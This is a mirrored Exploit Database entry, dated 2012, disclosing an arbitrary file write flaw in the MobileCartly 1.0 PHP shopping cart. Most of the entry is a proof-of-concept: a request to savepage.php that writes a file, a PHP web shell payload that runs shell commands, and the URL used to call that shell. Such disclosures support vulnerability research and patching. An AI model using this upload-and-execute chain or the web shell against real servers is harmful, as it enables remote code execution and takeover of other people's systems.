MobileCartly 1.0 – Arbitrary File Write

• Exploit Database
• 114 阅读

• 作者： Yakir Wizman
  日期： 2012-08-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20422/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  # ----------------------------------------------------------- # _____ _ ___ # / ____(_) || || | # | | _| |_ __ ___| | ___| | # | || | __/ _<code> |/ _</code> |/ _ \ | # | |____| | || (_| | (_| |__/ | # \_____|_|\__\__,_|\__,_|\___|_| # # ----------------------------------------------------------- # MobileCartly 1.0 Arbitrary File Write Vulnerability # Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com> # Date 10/08/2012 # Download - http://mobilecartly.com/mobilecartly.zip # ISRAEL # ----------------------------------------------------------- # Author will be not responsible for any damage. # ----------------------------------------------------------- # I. DESCRIPTION # ----------------------------------------------------------- # The application is prone to arbitrary file write / overwrite vulnerability. # # ----------------------------------------------------------- # II. PoC EXPLOIT # ----------------------------------------------------------- # http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE # FILENAME for example &apos;shell.php&apos; # CODE for example &apos;<?php echo(shell_exec($_GET[&apos;cmd&apos;])); ?>&apos; # Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir # -----------------------------------------------------------